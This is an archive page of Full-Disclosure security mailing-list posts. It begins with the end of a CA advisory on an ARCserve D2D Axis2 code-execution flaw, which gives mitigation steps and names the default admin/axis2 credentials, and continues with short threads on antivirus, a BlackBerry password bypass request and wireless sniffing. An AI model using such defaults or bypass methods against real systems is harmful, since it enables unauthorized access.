2.  Go to the directory "\TOMCAT\webapps\WebServiceImpl", and 
remove the folder "axis2-web".

3.  Edit "\TOMCAT\webapps\WebServiceImpl\WEB-INF\web.xml", and

remove the content of AxisAdminServlet's servlet and servlet
mapping. 
 
The content to remove will look like the text below:

- 
Apache-Axis Admin Servlet Web Admin
AxisAdminServlet
 
org.apache.axis2.transport.http.AxisAdminServlet
100
  
- 
AxisAdminServlet
/axis2-admin/*
  

4.  Change the username and password parameters in the axis2.xml file to

stronger credentials that conform to your organization's password 
policies. 
"\TOMCAT\webapps\WebServiceImpl\WEB-INF\conf\axis2.xml"
   
   admin
   axis2

5.  Start "CA ARCserve D2D Web Service".


References

CVE-201X- - CVE Reference Pending

CA ARCserve D2D r15 Web Service Apache Axis2 World Accessible Servlet
Code 
Execution Vulnerability Poc Dec 30 2010 11:04AM
http://www.securityfocus.com/archive/1/515494/30/0/threaded
http://marc.info/?l=bugtraq&m=129373168501496&w=2

Computer Associates ARCserve D2D r15 Web Service Apache Axis2 World 
Accessible Servlet Code Execution Vulnerability Poc
http://retrogod.altervista.org/9sg_ca_d2d.html


Acknowledgement

rgod


Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com

If you discover a vulnerability in a CA Technologies product, please
report 
your findings to the CA Technologies Product Vulnerability Response
Team.
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilj...@ca.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.16 (MingW32)

iEYEARECAAYFAk0eRkEACgkQeSWR3+KUGYVuvQCgkCI+mqnFSazvhzN8anG9dPEu
4GEAoJeHEInf6VzrioKGscIj5J0xq+Mb
=XuTb
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] looking for enterprise AV solution

[James Rankin]

Ditto on the belt and braces approach.

I've had a lot of good experiences with Sunbelt's Vipre product. It is
extremely easy to deploy and manage in the enterprise.

On 27 October 2010 11:32, Jamie Riden  wrote:

> On 26 October 2010 19:26, bk  wrote:
> > (resending from correct account)
> > On Oct 26, 2010, at 6:55 AM, Mikhail A. Utin wrote:
> >
> >> Folks,
> >> We are looking an enterprise level AV-software . Any advising?
> >
> > Signature-based AV is a dead technology.  Updates don't get released
> until hours after you're already infected, so all it really ends up doing is
> being a resource-suck on your CPUs and hard-disk access.
> >
> > My recommendation:  Buy whatever has the highest composite score for ease
> of management, limited resource consumption, and affordability.
> >
> > Anyone who says "get Vendor X" or "get Brand Y" without telling you what
> selection criteria they used is a tool.  How do you know if what is
> important to you was also important to them in making the selection?
>
> If you've got a decent perimeter, it should keep the threats out for
> some time, but I tend to agree. AV these days is starting to be more
> about detection than prevention - it will at least highlight that you
> have a problem so you can deal with it. Think of it as part of your
> intrusion detection if it helps.
>
> Oh, and somewhere I used to work ran two separate AV products on the
> mail gateway, and then a third on desktops on servers. I suspect this
> was more about licensing models (couldn't do per-seat for email as we
> had >100k email addresses) than paranoia, but it did help out
> considerably to have independent engines.
>
> cheers,
>  Jamie
> --
> Jamie Riden / ja...@honeynet.org / jamie.ri...@gmail.com
> http://uk.linkedin.com/in/jamieriden
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Need some direction

[James Lay]

Hello all.

So I've been tasked with discovering exactly how some malicious
java_cache.tmp files got to a users drive.  Am I on the right track
by guessing these were created by a malicious .jar file?  Thanks for the
direction.

James


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apple CoreGraphics (Preview) Memory Corruption Vulnerability - CVE-2010-1801

[James Craig]

Hello,
this bug looks like *((int*)0, why was it marked as a heap overflow?
Best,
James.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] PacketStorm

[james]

Anyone know what happen to packetstorm.org 
 
The site is down!
 
 

James Smith
Email: ja...@smithwaysecurity.com
Website: www.smithwaysecurity.com
Phone Number: (877) 352-6665

**The information contained in this message may be privileged and is confidential information intended for the use of the addressee listed above. If you are neither the intended recipient nor the employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any disclosure copying, distribution or the taking of any action in reliance on the contents of this information is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Blackberry pwd hack or reset

[james]

Hello everyone;

I was given a black berry is their a method To hack or reset the  
password without an OS reinstallation?


Sent from my iPhone

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Blackberry pwd hack or reset

[james]

Hello everyone;

Not sure if my first email went though.

Well I was given a blackberry which was locked.

  I was woundering if their was another method to hack or reset a  
black berry password without an OS reinstallation?


Sent from my iPhone

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Security Focus down?

[James Lay]

> No doesn't seems like that. It's fine and up with no problems.
>
> Pradip
>
> On Mon, May 17, 2010 at 9:33 PM, James Lay 
> wrote:
>
>> So...all my feeds and web access to Security Focus have tanked over this
>> weekendanyone know if they are getting DoS'd or anything like that?
>>
>> James
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

Well I'll be darned..it is up now...sweet.

James

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security Focus down?

[James Lay]

So...all my feeds and web access to Security Focus have tanked over this
weekendanyone know if they are getting DoS'd or anything like that?

James

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Israel IP range legit or false?

[james]

Hello everyone:Tonight I was looking though some look information I had saved on a hard drive When I came across a few ip ranges.Ip ranges:212.143 *** i212.149212.159.0.2212.159.1.1212.159.1.4212.179.*** Israelis isp's)212.208.0.12213.8.***.***what I am not getting is did they update their Ip ranges or are they using some of them as frontshere's an exp. (212.159.0.3 Should be an Israel Ip unless they updated if not then they are using it as front for some type of information storage.)London Telehouse LAN)London Telehouse L2TP)(What I would like to know is are these they real Ip ranges or were they the old the ones before updated.)James SmithEmail: ja...@smithwaysecurity.comWebsite: www.smithwaysecurity.comPhone Number: (877) 352-6665**The information contained in this message may be privileged and is confidential information intended for the use of the addressee listed above. If you are neither the intended recipient nor the employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any disclosure copying, distribution or the taking of any action in reliance on the contents of this information is strictly prohibited. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best Wireless Sniffer for MAC OS X

[James Lay]

From: Justin Chang 
Date: Tue, 13 Apr 2010 14:41:36 +
To: Full-disclosure ,

Subject: [Full-disclosure] Best Wireless Sniffer for MAC OS X

Hello group

What are some of the best wireless sniffers on MAC OS X platform? I want to
be able to sniff the traffic and look for sensitive information. The company
has a small budget so both free and commercial are fine

Thanks 


Justin,

Compile kismet (works for me on SL 10.6.3) or use Kismac for a more gui
flavor.

James
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Security system

[james]

Any one got any ides how I would program a system to call me from a  
voip network to alert me of a home security breach.

Sent from my iPhone

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/